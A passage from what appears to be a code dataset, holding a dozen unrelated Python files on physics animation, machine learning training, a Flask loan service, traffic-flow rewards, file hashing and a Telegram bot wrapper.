/usr/bin/env python3\n\n# Box with superposition of several stationary states, ground state and some excited states\n\nimport numpy as np\nfrom matplotlib.pyplot import figure,axes,plot,title,xlabel,ylabel,show\nfrom matplotlib.animation import FuncAnimation\n\ndef animate_curve_2d(x_lim,y_lim,x_data,y_data,N,plt_cmd,titl,x_label,y_label,xpos):\n fig=figure()\n akse=axes(xlim=x_lim,ylim=y_lim)\n title(titl)\n xlabel(x_label)\n ylabel(y_label)\n line, =plot([],[],plt_cmd)\n pos, =plot([],[],'ro')\n def init():\n line.set_data([],[])\n pos.set_data([],[])\n return line,pos\n def anim(i,x_data,y_data):\n line.set_data(x_data,y_data[i,:])\n pos.set_data(xpos[i],0.1)\n return line,pos\n ani=FuncAnimation(fig,anim,init_func=init,frames=N,fargs=(x_data,y_data),interval=50,blit=True,repeat=False)\n show()\n\n# Function to animate superposition of several states (with quantum numbers spread dn about n) in a box.\ndef animate_wavepacket(n,dn):\n x0=0.0\n x1=1.0\n NX=500\n x=np.arange(NX+1)*(x1-x0)/NX # Table with x-values\n n1=n-dn # Lowest quantum number\n n2=n+dn # Highest quantum number\n N=2*dn+2\n\n nq=np.arange(n1,n2+1) # Quantum numbers for states\n psi=np.empty((n2-n1,NX+1))\n wq=np.ones(n2-n1)*(0+0j) # Complex zeros\n a=np.empty(n2-n1)\n om=np.zeros(n2-n1)\n fi=-np.pi/2\n for i in range(n2-n1):\n wq[i]=(np.cos((nq[i]-n)*np.pi/N))**2*np.exp(1j*(nq[i]-n)*fi)\n om[i]=nq[i]**2 # Frequency of state i\n a=wq/np.sqrt(np.sum(np.abs(wq)**2)) # Table with expansion coefficients\n\n # Weighted eigenfunction:\n wpsi=np.ones((n2-n1,NX+1))*(0+0j)\n for i in range(n2-n1):\n wpsi[i]=np.sqrt(2/x1)*np.sin(nq[i]*np.pi*x/x1)*a[i]\n\n t0=0\n T=0.01\n NT=200\n t=np.arange(NT+1)*(T-t0)/NT # Time table \n\n Psi=np.ones(NX+1)*(0+0j) # Table of complex zeros\n Psisq=np.zeros((NT+1,NX+1))\n expectationvalue=np.zeros(NT+1)\n\n for nt in range(NT+1):\n Psi*=0+0j\n for i in range(n2-n1):\n exp=np.exp(-1j*om[i]*t[nt]) # Time-exponential for state i\n Psi+=wpsi[i]*exp\n Psisq[nt,:]=abs(Psi)**2\n s=0\n for i in range(1,NX):\n s+=x[i]*Psisq[nt,i] # Integration by trapezoidal rule\n expectationvalue[nt]=s*(x1-x0)/NX\n\n animate_curve_2d((x0,x1),(0,np.max(Psisq)),x,Psisq,NT,'','$\\Psi(x,t)$: Superposition, $\\langle x\\\\rangle$ in red','$x$','$|\\Psi(x,t)|^2$',expectationvalue)\n\nif __name__=='__main__':\n n=208 # Central quantum number\n dn=10 # Spread in quantum numbers\n animate_wavepacket(n,dn)\n\n","sub_path":"s4/kvante-TFY4215/python_prog/box_non_stationary_3.py","file_name":"box_non_stationary_3.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"7906096","text":"def seq(n):\n i = list(map(int, n))\n lim = len(i)\n d = i[0]-i[1]\n for l in range(1, lim-1):\n if d != i[l]-i[l+1]:\n return False\n return True\n\nN = int(input())\nif N < 100:\n print(N)\nelse:\n ans = 99\n for n in range(100, N+1):\n if seq(str(n)):\n ans += 1\n print(ans)\n ","sub_path":"BOJ/201902/1065.py","file_name":"1065.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"346417840","text":"#data preprocessing\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\ntrain_datagen = ImageDataGenerator(rescale=1.0/255,shear_range=0.2,zoom_range=0.2,horizontal_flip=True)\r\ntrain_generator = train_datagen.flow_from_directory(r\"train_data_dir\",target_size=(150,150),batch_size=30,class_mode=\"categorical\")\r\nvalid_datagen = 
ImageDataGenerator(rescale=1.0/255)\r\nvalid_generator = valid_datagen.flow_from_directory(r\"valid_data_dir\",target_size=(150,150),batch_size=25,class_mode=\"categorical\") # use valid_datagen here; the original reused train_datagen, applying augmentation to the validation data\r\n\r\n#import VGG16\r\nfrom keras.applications import VGG16\r\n\r\nvgg16_model = VGG16(include_top=False,weights=\"imagenet\",input_shape=(150,150,3))\r\n\r\n#VGG16+FC\r\nfrom keras import models\r\nfrom keras import layers\r\nfrom keras import regularizers\r\n\r\nmodel = models.Sequential()\r\nmodel.add(vgg16_model)\r\nmodel.add(layers.Flatten())\r\nmodel.add(layers.Dropout(0.2))\r\nmodel.add(layers.Dense(128,activation=\"relu\",kernel_regularizer=regularizers.l2(0.01)))\r\nmodel.add(layers.Dropout(0.5))\r\nmodel.add(layers.Dense(20,activation=\"softmax\"))\r\n\r\nvgg16_model.trainable = True\r\n\r\nset_trainable = False\r\nfor layer in vgg16_model.layers:\r\n if layer.name == 'block5_conv1':\r\n set_trainable = True\r\n if set_trainable:\r\n layer.trainable = True\r\n else:\r\n layer.trainable = False\r\n\r\n#training\r\nfrom keras.optimizers import SGD\r\nfrom keras.callbacks import EarlyStopping\r\n\r\nearly_stopping = EarlyStopping(patience=10, verbose=1)\r\nmodel.compile(loss=\"categorical_crossentropy\",optimizer=SGD(lr=0.0001,momentum=0.9),metrics=[\"acc\"])\r\nhistory = model.fit_generator(train_generator,steps_per_epoch=1500,epochs=200,validation_data=valid_generator,validation_steps=200,verbose=1,callbacks=[early_stopping])\r\n\r\nmodel.save(\"model_earlystopping.h5\")\r\n\r\n#plot images\r\nimport matplotlib.pyplot as plt\r\n\r\nhistory_dict = history.history\r\nloss_values = history_dict[\"loss\"]\r\nval_loss_values = history_dict[\"val_loss\"]\r\nacc_values = history_dict[\"acc\"]\r\nval_acc_values = history_dict[\"val_acc\"]\r\n\r\nepochs = range(1,len(loss_values)+1)\r\nplt.plot(epochs,loss_values,\"bo\",label=\"Training Loss\")\r\nplt.plot(epochs,val_loss_values,\"b\",label=\"Validation Loss\")\r\nplt.xlabel(\"Epochs\")\r\nplt.ylabel(\"Loss\")\r\nplt.legend()\r\nplt.show()\r\n\r\nplt.plot(epochs,acc_values,\"bo\",label=\"Training Acc\")\r\nplt.plot(epochs,val_acc_values,\"b\",label=\"Validation Acc\")\r\nplt.xlabel(\"Epochs\")\r\nplt.ylabel(\"Acc\")\r\nplt.legend()\r\nplt.show()\r\n","sub_path":"vgg16+fc.py","file_name":"vgg16+fc.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253568883","text":"# -*- coding: utf-8 -*-\n\"\"\"\n yinsho.services.AdjustmentService\n #####################\n yinsho LoanService module\n\"\"\"\nimport hashlib, copy\nfrom flask import json, g\nfrom sqlalchemy import and_\nfrom ..model.credit import *\nfrom ..model.transaction import *\nfrom ..model.application import *\nfrom ..model.creditLevel import *\nfrom ..workflow import task\nfrom ..workflow.parameter import *\nfrom ..database.sqlal import simple_session\n\nimport decimal\nfrom decimal import Decimal\nimport datetime\nimport random\n\nclass AdjustmentService():\n\n def save(self,**kwargs):\n u''' Save a credit-limit adjustment '''\n lend_transaction=kwargs.get('lend_transaction')\n adjustment=kwargs.get('adjustment') \n application=g.db_session.query(Application).join(ApplicationTransaction,ApplicationTransaction.application_id==Application.id).filter(ApplicationTransaction.transaction_id==lend_transaction.get('application_transaction_id')).first()\n app =Application(status=u'暂存',customer=application.customer,product_code='973') # Chinese DB values (e.g. u'暂存' = 'draft') are stored data and kept untranslated\n at = 
ApplicationTransaction(application=app,transaction_name=u\"%s授信金额调整申请\"%(application.customer.party.name)) \n g.db_session.add(at)\n g.db_session.commit()\n adjustment.update({\n 'lend_transaction_id':lend_transaction.get('transaction_id'),\n 'application_transaction_id':at.transaction_id, \n })\n cate = Adjustment(**adjustment)\n g.db_session.add(cate)\n g.db_session.commit()\n return {'adjustment':cate,'application':app}\n\n\n def update(self,**kwargs):\n u''' Update the contents of a credit-limit adjustment '''\n adjustment=kwargs.get('adjustment')\n id = adjustment.get('id')\n adjustment.pop('id') \n adjustment.pop('application_transaction') \n adjustment.pop('lend_transaction')\n #adjustment.pop('adjustment_book')\n g.db_session.query(Adjustment).filter(Adjustment.id==id).update(adjustment)\n return {'success':True}\n\n def submit(self, **kwargs):\n u''' Submit a credit-limit adjustment application '''\n adjustment=kwargs.get('adjustment')\n start_activity = g.db_session.query(Activity).join(Workflow, Workflow.start_activity_id == Activity.activity_id).filter(Workflow.workflow_name==u\"授信调整流程\").first()\n cl=g.db_session.query(Adjustment).filter(Adjustment.id == adjustment.get('id')).first()\n at=cl.application_transaction\n start(at, start_activity) \n g.db_session.query(Application).filter(Application.id == at.application_id).update({'status':u'申请'}) \n return {'success':True}\n\n\n def save_submit(self,**kwargs):\n u''' Save and then submit a credit-limit adjustment application '''\n r = self.save(**kwargs) \n adjustment=r.get('adjustment')\n start_activity = g.db_session.query(Activity).join(Workflow, Workflow.start_activity_id == Activity.activity_id).filter(Workflow.workflow_name==u\"授信调整流程\").first()\n cl=g.db_session.query(Adjustment).filter(Adjustment.id == adjustment.id).first()\n at=cl.application_transaction\n start(at, start_activity)\n app=g.db_session.query(Application).filter(Application.id == at.application_id).update({'status':u'申请'})\n return {'adjustment':adjustment,'application':app}\n\n def query(self, **kwargs):\n u''' Query the list of credit-limit adjustments '''\n q = g.db_session.query(Adjustment).all()\n rst_list=[{'adjustment':r,'lend_transaction':r.lend_transaction,'party':r.lend_transaction.application_transaction.application.customer.party,'application':r.application_transaction.application,'product':r.lend_transaction.application_transaction.application.product } for r in q] \n return rst_list\n\n def query_by_id(self,application_id):\n u''' Query credit-limit adjustment details by application_id '''\n r = g.db_session.query(Adjustment).join(ApplicationTransaction,ApplicationTransaction.transaction_id==Adjustment.application_transaction_id).filter(ApplicationTransaction.application_id==application_id).first()\n rst_data={'adjustment':r,'lend_transaction':r.lend_transaction,'party':r.lend_transaction.application_transaction.application.customer.party,'application':r.application_transaction.application,'product':r.lend_transaction.application_transaction.application.product} \n return rst_data \n\n","sub_path":"src_20170503/src/web/server/fabs/services/adjustment.py","file_name":"adjustment.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"240680832","text":"# working folder, containing xlsx files (all subfolders will be included)\nFOLDER = '/media/sf_Shared/reports'\n\n# name of the sheet in xlsx workbook\nSHEET_NAME = 'Sheet1'\n\n# name of the table in database\nTABLE_NAME = 'reports_test'\n\n# name of the fields in the table in the database\nFIELD_NAMES = 'object_id, object_name, customer_id, customer_name, contractor_id, ' \\\n 
'contractor_name, category, status, date'\n\n# number of spawning processes\nNUMBER_OF_DAEMONS = 4\n\n# number of the rows in xlsx file before first row with data\nFIELD_NAMES_OFFSET = 1\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"4140833","text":"# -*- coding: utf-8 -*-\n# Author: XuMing \n# Brief: learn the addition operation with a deep network\n\n# input '100+100'\n# output '200'\n\nimport numpy as np\nfrom keras import layers\nfrom keras.models import Sequential\nfrom six.moves import range\n\n\nclass CharTable(object):\n \"\"\"\n Given a set of chars:\n encode chars to a one hot integer representation\n decode the one hot integer representation to their char output\n decode a vector of probs to their char output\n \"\"\"\n\n def __init__(self, chars):\n self.chars = sorted(set(chars))\n self.char_indices = dict((c, i) for i, c in enumerate(self.chars))\n self.indices_char = dict((i, c) for i, c in enumerate(self.chars))\n\n def encode(self, C, num_rows):\n \"\"\"\n One hot encode given string C.\n :param C:\n :param num_rows: number of rows in the returned one hot encoding.\n :return:\n \"\"\"\n x = np.zeros((num_rows, len(self.chars)))\n for i, c in enumerate(C):\n x[i, self.char_indices[c]] = 1\n return x\n\n def decode(self, x, calc_argmax=True):\n if calc_argmax:\n x = x.argmax(axis=-1)\n return ''.join(self.indices_char[x] for x in x)\n\n\n# parameters\nTRAINING_SIZE = 50000\nDIGITS = 3 # max output is 999+999=1998\nINVERT = True\n\nMAXLEN = DIGITS + 1 + DIGITS\nchars = '0123456789+ '\nctable = CharTable(chars)\n\nquestions = []\nexpected = []\nseen = set()\nprint('make data...')\nwhile len(questions) < TRAINING_SIZE:\n f = lambda: int(''.join(np.random.choice(list('0123456789'))\n for i in range(np.random.randint(1, DIGITS + 1))))\n a, b = f(), f()\n # skip questions we have already seen\n # treat mirrored pairs as duplicates, since 'a+b' equals 'b+a'\n key = tuple(sorted((a, b)))\n if key in seen:\n continue\n seen.add(key)\n # pad the data with spaces such that it is always maxlen\n q = '{}+{}'.format(a, b)\n query = q + ' ' * (MAXLEN - len(q))\n ans = str(a + b)\n # answers: max size of digits+1\n ans += ' ' * (DIGITS + 1 - len(ans))\n if INVERT:\n query = query[::-1]\n questions.append(query)\n expected.append(ans)\nprint('TOTAL questions:', len(questions))\n\nprint('vector...')\nx = np.zeros((len(questions), MAXLEN, len(chars)), dtype=np.bool_) # np.bool was removed from NumPy; use np.bool_\ny = np.zeros((len(questions), DIGITS + 1, len(chars)), dtype=np.bool_)\nfor i, sentence in enumerate(questions):\n x[i] = ctable.encode(sentence, MAXLEN)\nfor i, sentence in enumerate(expected):\n y[i] = ctable.encode(sentence, DIGITS + 1)\n\n# shuffle (x,y)\nindices = np.arange(len(y))\nnp.random.shuffle(indices)\nx = x[indices]\ny = y[indices]\n\n# explicitly set apart 10% for validation\nsplit_at = len(x) - len(x) // 10\n(x_train, x_val) = x[:split_at], x[split_at:]\n(y_train, y_val) = y[:split_at], y[split_at:]\n\nprint('training data:')\nprint(x_train.shape)\nprint(y_train.shape)\nprint('val data:')\nprint(x_val.shape)\nprint(y_val.shape)\n\n# RNN; can be replaced by GRU or SimpleRNN\nRNN = layers.LSTM\nHIDDEN_SIZE = 128\nBATCH_SIZE = 128\nLAYERS = 1\n\nprint('Build model...')\nmodel = Sequential()\n# encode the input sentence\nmodel.add(RNN(HIDDEN_SIZE, input_shape=(MAXLEN, len(chars))))\n# same as the decoder RNN input, repeatedly provide the last hidden state of RNN for each time step\n# repeat 'digits+1' times to the max length of 
output\nmodel.add(layers.RepeatVector(DIGITS + 1))\nfor i in range(LAYERS):\n # return sequences of (num_samples, timesteps, output_dim)\n model.add(RNN(HIDDEN_SIZE, return_sequences=True))\n\n# apply a dense layer to every temporal slice of the input\nmodel.add(layers.TimeDistributed(layers.Dense(len(chars))))\nmodel.add(layers.Activation('softmax'))\nmodel.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\n\n# train\nfor iteration in range(1, 20):\n print()\n print('-')\n print('iteration', iteration)\n model.fit(x_train, y_train,\n batch_size=BATCH_SIZE,\n epochs=1,\n validation_data=(x_val, y_val))\n # select 10 samples from the validation set at random to visualize errors\n for i in range(10):\n ind = np.random.randint(0, len(x_val))\n rowx, rowy = x_val[np.array([ind])], y_val[np.array([ind])]\n preds = model.predict_classes(rowx, verbose=0)\n q = ctable.decode(rowx[0])\n correct = ctable.decode(rowy[0])\n guess = ctable.decode(preds[0], calc_argmax=False)\n print('Q', q[::-1] if INVERT else q, end=' ')\n print('T', correct, end=' ')\n if correct == guess:\n print('\\033[92m' + '☑' + '\\033[0m', end=' ')\n else:\n print('\\033[91m' + '☒' + '\\033[0m', end=' ')\n print(guess)\n","sub_path":"07keras/12rnn_num_add.py","file_name":"12rnn_num_add.py","file_ext":"py","file_size_in_byte":4673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"111113427","text":"# general-purpose set functions\n\ndef intersect(*args):\n res=[]\n for x in args[0]:\n for other in args[1:]:\n if x not in other:\n break\n else:\n res.append(x)\n return res\n\n\ndef union(*args): # renamed from the original misspelling 'uniion'\n res=[]\n for seq in args:\n for x in seq:\n if x not in res:\n res.append(x)\n\n return res\n\nif __name__=='__main__':\n s1,s2,s3='SPAM','SCAM','SLAM'\n print(intersect(s1,s2,s3))\n print(union(s1,s2,s3))\n numa,numb=[1,2,3],(1,4)\n print(intersect(numa,numb))\n\n","sub_path":"day10/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"468829220","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ncurrent_users = ['admin','joe','ajay','marry','ariana']\nif current_users:\n\tfor user in current_users:\n\t\tif user == 'admin':\n\t\t\tprint(\"Hello \" + user + \", would you like to see a status report?\")\n\t\telse:\n\t\t\tprint(\"Hello \" + user + \", thank you for logging in again\")\nelse:\n\tprint(\"we need to find some users!\")\n\t\nnew_users = ['Joe','jack','jim','marry','mariah']\nfor new_user in new_users:\n\tif new_user.lower() in current_users:\n\t\tprint(\"The name is already taken\")\n\telse:\n\t\tprint(\"The name is available\")","sub_path":"hello_users.py","file_name":"hello_users.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"131847909","text":"#! 
Flux3D 12.0\nimport math\nimport time\n\n#from Definitions_and_functions import *\ndef print_time_hms( time_sec ):\n \"This prints time_sec in hour-min-sec format\"\n if(time_sec >= 60.0 and time_sec < 3600.0):\n total_time_minutes = int(math.floor(time_sec/60.0))\n total_time_secondes = int(round(60*(time_sec/60.0-total_time_minutes)))\n return str(total_time_minutes)+\" min \"+str(total_time_secondes)+\" sec \\n\"\n elif(time_sec >= 3600.0):\n total_time_hours = time_sec/3600.0\n total_time_minutes = 60*(total_time_hours-math.floor(total_time_hours))\n total_time_secondes = 60*(total_time_minutes-math.floor(total_time_minutes))\n return str(int(total_time_hours))+\" h \"+str(int(total_time_minutes))+\" min \"+str(int(total_time_secondes))+\" sec \\n\"\n else:\n return \"%0.1f s \\n\" % time_sec\n\n\n\nt = time.time()\n\nnewProject()\n## start scripting\n\nexecuteBatchSpy('1_param_revF.py') \t\t# Defines different parameters\ntime_params = time.time() - t\n\nexecuteBatchSpy('2_app_def.py') \t\t\t# Defines different parameters\ntime_app_def= time.time() - t\n\nexecuteBatchSpy('3_mesh_info.py') \t\t# Defines different parameters\ntime_mesh = time.time() - t\n\nexecuteBatchSpy('4_geom_revE.py') \t\t# Defines different parameters\ntime_geometry = time.time() - t\n\nexecuteBatchSpy('5_mat_def.py') \t\t\t# Defines different parameters\ntime_materials = time.time() - t\n\nexecuteBatchSpy('6_coils_concentric_revF.py') # Defines different parameters\n\nexecuteBatchSpy('7_assign_revB.py') # Defines different parameters\n\nexecuteBatchSpy('8_sensors.py') # Defines different parameters\n\nexecuteBatchSpy('9_make_scenarios_passive_revC.py') # Defines different parameters\n\nexecuteBatchSpy('10_make_scenarios_active_revC.py') # Defines different parameters\n\n\nt = time.time()\n\nmeshDomain()\n\ngenerateSecondOrderElements()\n\n#saveProjectAs(project_path+project_name)\nif(solving):\n\tsaveProjectAs(project_path+project_name)\n # SCENARII\n\t#executeBatchSpy('Reference_values.py') # Execute a reference values scenario\n\t#executeBatchSpy('Rotor_rotation.py') # Execute a rotor rotation scenario\n #executeBatchSpy('PM_magnetisation_rotation.py') # Execute a PM magnetisation rotation scenario\n # POSTPROCESSING\n #executeBatchSpy('Coil_fluxes.py') # Computation of the coil fluxes\n #executeBatchSpy('EM_torque.py') # Computation of the electromagnetic torque\n\t#executeBatchSpy('Cut_plans_induction.py') # Display of induction cut plans\n\ntime_solving = time.time() - t\n\n# The original referenced the undefined names time_initialisation and total_time (the\n# commented-out sum also used undefined variables); the timers above are cumulative,\n# so approximate the missing values instead.\ntime_initialisation = time_params\ntotal_time = time_materials + time_solving # setup (cumulative up to materials) plus solving; scripts 6-10 are not timed individually\n\nprint(\"\\n\")\nprint(\"Time for initialisation: \"+print_time_hms(time_initialisation))\nprint(\"Time for building the geometry: \"+print_time_hms(time_geometry))\nprint(\"Time for building the mesh: \"+print_time_hms(time_mesh))\nprint(\"Time for physics: \"+print_time_hms(time_materials))\nprint(\"Time for solving: \"+print_time_hms(time_solving))\nprint(\"\\n\")\nprint(\"Total time: \"+print_time_hms(total_time))","sub_path":"2_int_rotor/2_int_rotor_slotted/4_icems/00_main.py","file_name":"00_main.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"159513302","text":"import hashlib\nimport logging\n\n\ndef get_md5(file_path):\n hash_md5 = hashlib.md5()\n with open(file_path, \"rb\") as file:\n for chunk in iter(lambda: file.read(4096), b\"\"):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\n\ndef 
save_md5_to_txt(md5, output_path):\n with open(output_path, 'w', encoding='utf-8') as file:\n file.write(md5)\n\ndef get_md5_regex_pattern():\n return r\"([a-fA-F\\d]{32})\"\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO,\n format='%(name)s: %(message)s',\n )\n logging.info(\"Starting...\")\n file_path = '/data/4chanWebScrapper.zip'\n output_path = '/data/md5_of_zip.txt'\n md5 = get_md5(file_path)\n logging.info(f\"MD5 of file: [MD5={md5}]\")\n save_md5_to_txt(md5, output_path)\n logging.info(\"Finished\")\n","sub_path":"Server/md5checker.py","file_name":"md5checker.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"87862412","text":"\"\"\"A series of reward functions.\"\"\"\n\nfrom flow.core.params import SumoParams\nfrom gym.spaces import Box, Tuple\nimport numpy as np\n\nfrom collections import defaultdict\nfrom functools import reduce\n\nfrom requests import head\n\n\nACC = 5.4\n\ndef total_lc_reward(env, rl_action):\n reward_dict = {\n 'rl_desired_speed': rl_desired_speed(env),\n 'rl_action_penalty': rl_action_penalty(env, rl_action),\n 'uns4IDM_penalty': unsafe_distance_penalty4IDM(env),\n 'meaningless_penalty': meaningless_penalty(env),\n 'target_velocity': target_velocity(env),\n }\n return reward_dict\n\n\ndef target_velocity(env):\n\n return 0\n\n\ndef rl_desired_speed(env, rl):\n vel = np.array(env.k.vehicle.get_speed(rl))\n rl_des = env.initial_config.reward_params.get('rl_desired_speed', 0)\n target_vel = env.env_params.additional_params['target_velocity']\n regulation_speed = env.initial_config.reward_params.get('regulation_speed', 0)\n\n if rl_des == 0:\n return 0\n\n if vel < -100:\n return 0.\n\n if vel <= target_vel:\n cost = vel\n rwd = cost/target_vel\n else:\n cost = regulation_speed-vel\n rwd = cost/(regulation_speed-target_vel)\n\n return rl_des*rwd\n\n\ndef unsafe_distance_penalty4IDM(env, prev_lane, now_lane, tail_way, tail_speed, prev_lane_nums, now_lane_nums, rl):\n uns4IDM_p = env.initial_config.reward_params.get('uns4IDM_penalty', 0)\n\n # Parameter of IDM\n T = 1\n a = b = ACC\n s0 = 5.45\n v = env.k.vehicle.get_speed(rl)\n tw = tail_way\n\n rwd = 0\n if tail_speed < 0:\n rwd = 0.\n\n else:\n s_star = 0\n # (prev_lane != now_lane) means that the agent have executed lane-changing\n # (prev_lane_nums == now_lane_nums) means that the number of lanes on the road is same before\n # It only work in the lane reduction scenario\n if (prev_lane != now_lane) and (prev_lane_nums == now_lane_nums):\n if abs(tw) < 1e-3:\n tw = 1e-3\n rwd = -3.\n\n else:\n follow_vel = tail_speed\n s_star = s0 + max(\n 0, follow_vel * T + follow_vel * (follow_vel - v) / (2 * np.sqrt(a * b)))\n rwd = uns4IDM_p * max(-3, min(0, 1 - (s_star / tw) ** 2))\n\n return rwd\n\n\ndef leader_unsafe_distance_penalty(env, headway, rl_speed, leader_speed, veh_length):\n leader_uns_p = env.initial_config.reward_params.get('leader_uns_penalty', 0)\n\n # Parameter of IDM\n T = 1\n a = b = ACC\n s0 = 5.45\n\n # exception case: when the agent don't observe the leading vehicle on same lane\n if leader_speed < 0:\n return 0.\n\n s_star = s0 + max(\n 0, rl_speed * T + rl_speed * (rl_speed - leader_speed) / (2 * np.sqrt(a * b)))\n\n if headway > s_star:\n rwd = 0.\n\n else:\n rwd = leader_uns_p * max(-5, min(0, 1 - (s_star / headway) ** 2))\n\n return rwd\n\n\ndef rl_action_penalty(env, actions, rl):\n action_penalty = env.initial_config.reward_params.get('rl_action_penalty', 0)\n\n if actions 
is None or action_penalty == 0:\n return 0\n\n actions = actions[rl]\n\n # boolean condition\n if len(actions) == 2:\n direction = actions[1::2]\n for i in range(len(direction)):\n if direction[i] <= -0.333:\n direction[i] = -1\n elif direction[i] >= 0.333:\n direction[i] = 1\n else:\n direction[i] = 0\n\n elif len(actions) == 4:\n direction = actions[1:]\n\n if direction[0] == 1:\n direction = np.array([-1])\n elif direction[1] == 1:\n direction = np.array([0])\n else:\n direction = np.array([1])\n\n reward = 0\n if direction:\n if env.k.vehicle.get_previous_lane(rl) == env.k.vehicle.get_lane(rl):\n reward -= action_penalty\n\n return reward\n\n\ndef meaningless_penalty(env, prev_lane, now_lane, prev_headway, headway, prev_lane_nums,\n now_lane_nums, rl, visibility_length):\n mlp = env.initial_config.reward_params.get('meaningless_penalty', 0)\n reward = 0\n lc_pen = 0\n\n if mlp:\n if (prev_lane != now_lane) and (prev_lane_nums == now_lane_nums):\n headway_criterion = headway - prev_headway\n semi_reward = - (headway_criterion - lc_pen)\n reward -= mlp * (semi_reward / visibility_length)\n\n return reward","sub_path":"flow/flow/core/MA_ring_rewards.py","file_name":"MA_ring_rewards.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"562588763","text":"import logging\nimport os\nimport pkgutil\nfrom functools import partial\n\nimport attr\nfrom telegram.error import (\n BadRequest,\n ChatMigrated,\n NetworkError,\n TelegramError,\n TimedOut,\n Unauthorized,\n)\nfrom telegram.ext import (\n CommandHandler,\n Filters,\n InlineQueryHandler,\n MessageHandler,\n Updater,\n)\n\nlogger = logging.getLogger(\"rich\")\n\nhere = os.path.abspath(os.path.dirname(__file__))\nget_path = partial(os.path.join, here)\n\n\n@attr.s(auto_attribs=True)\nclass TelegramBot:\n \"\"\"Just a class for python-telegram-bot\"\"\"\n\n token: str\n eduzen_id: int = 3652654\n heroku: int = 0\n port: int = 80\n workers: int = 4\n use_context: bool = True\n updater: Updater = None\n\n def __attrs_post_init__(self):\n try:\n self.updater = Updater(token=self.token, workers=self.workers, use_context=self.use_context)\n except TelegramError:\n logger.exception(\"Something wrong...\")\n raise SystemExit\n\n logger.info(\"[bold green]Created updater for %s\" % (self.updater.bot.name), extra={\"markup\": True})\n self.updater.dispatcher.add_error_handler(self.error)\n self._load_plugins()\n\n def start(self):\n if not self.heroku:\n self.updater.start_polling()\n else:\n self.updater.start_webhook(listen=\"0.0.0.0\", port=self.port, url_path=self.token)\n self.updater.bot.setWebhook(f\"https://eduzenbot.herokuapp.com/{self.token}\")\n self.send_msg_to_eduzen(\"eduzen_bot reiniciado!\")\n self.updater.idle()\n\n def error(self, update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n try:\n raise context.error\n except Unauthorized:\n # remove update.message.chat_id from conversation list\n logger.error(\"Update caused Unauthorized error\")\n except BadRequest:\n # handle malformed requests - read more below!\n logger.error(f\"Update {update} caused error {context.error}\")\n except TimedOut:\n # handle slow connection problems\n logger.warning(f\"Update {update} caused TimedOut {context.error}\")\n except NetworkError:\n # handle other connection problems\n logger.error(f\"Update {update} caused error {context.error}\")\n except ChatMigrated:\n # the chat_id of a group has changed, use e.new_chat_id instead\n 
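            # note: a fuller handler could use context.error.new_chat_id here to remap the stored chat id; this implementation only logs.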
logger.error(f\"Update {update} caused error {context.error}\")\n except TelegramError:\n # handle all other telegram related errors\n logger.error(f\"Update {update} caused error {context.error}\")\n\n def add_handler(self, handler):\n self.updater.dispatcher.add_handler(handler)\n\n def add_list_of_handlers(self, handlers):\n for handler in handlers:\n self.add_handler(handler)\n\n def send_msg(self, msg):\n self.updater.bot.send_message(msg)\n\n def send_msg_to_eduzen(self, msg):\n logger.info(\"aviso a eduzen\")\n self.updater.bot.send_message(self.eduzen_id, msg)\n\n def create_command(self, name, func):\n return CommandHandler(name, func, pass_args=True, pass_chat_data=True, run_async=True)\n\n def create_command_args(self, name, func, pass_args=True, pass_job_queue=True, pass_chat_data=True):\n return CommandHandler(\n name,\n func,\n pass_args=pass_args,\n pass_job_queue=pass_job_queue,\n pass_chat_data=pass_chat_data,\n run_async=True,\n )\n\n def create_inlinequery(self, func):\n return InlineQueryHandler(func)\n\n def create_list_of_commands(self, kwargs):\n return [self.create_command(key, value) for key, value in kwargs.items()]\n\n def create_msg(self, func, filters=Filters.text):\n return MessageHandler(filters, func)\n\n def create_list_of_msg_handlers(self, args):\n return [self.create_msg(value) for value in args]\n\n def register_commands(self, kwargs):\n commands = self.create_list_of_commands(kwargs)\n self.add_list_of_handlers(commands)\n\n def register_message_handler(self, args):\n msgs = self.create_list_of_msg_handlers(args)\n self.add_list_of_handlers(msgs)\n\n def _get_commands(self, plugin):\n plugins = {}\n for line in plugin.__doc__.strip().splitlines():\n command = [substring.strip() for substring in line.strip().split(\"-\")]\n plugins[command[0]] = getattr(plugin, command[1])\n return plugins\n\n def _get_plugins(self):\n plugins = {}\n plugins_path = get_path(\"plugins/commands\")\n for importer, package_name, _ in pkgutil.iter_modules([plugins_path]):\n logger.info(f\"Loading {package_name}...\")\n sub_modules = get_path(plugins_path, package_name)\n importer.find_module(package_name).load_module(package_name)\n for importer, package_name, _ in pkgutil.iter_modules([sub_modules]):\n plugin = importer.find_module(package_name).load_module(package_name)\n if not plugin.__doc__:\n continue\n\n 